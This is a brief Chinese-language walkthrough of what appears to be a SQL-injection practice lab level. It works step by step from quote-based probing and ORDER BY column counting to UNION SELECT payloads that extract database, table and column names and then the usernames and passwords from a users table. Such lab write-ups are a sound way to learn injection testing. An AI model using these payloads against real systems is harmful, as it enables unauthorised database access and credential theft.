初始页面：

判断注入：?id=1, ?id=1', 这两个回显都正常，没有问题，再试?id=1"回显界面：

箭头方框的位置是："1""),别看错，前面的 ' 是和后面的 LIMIT 0,1' 闭合的。

所以我们可以猜想语句然后拼接语句：select * from xxx where id=("$id")

所以我们的payload就是：?id=1")--+

 猜解字段数payload：?id=-1") order by $number--+ ($number是数字变量)

当$number是4时：

 所以字段数有3个，payload：?id=-1") union select 1,2,3--+

 接下来就直接写payload就不截图了，前面的与一到三关一样，payload：

数据库名、用户：?id=-1") union select 1,database(),user()--+

表名：?id=-1") union select 1,2,group_concat(hex(table_name)) from information_schema.tables where table_schema=database()--+        security

列名：?id=-1") union select 1,2,group_concat(hex(column_name)) from information_schema.columns where table_name='users'--+    

USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id, username, password

查看username和password：?id=-1") union select 1,2,group_concat(username,0x3a,password) from users--+

就酱紫了！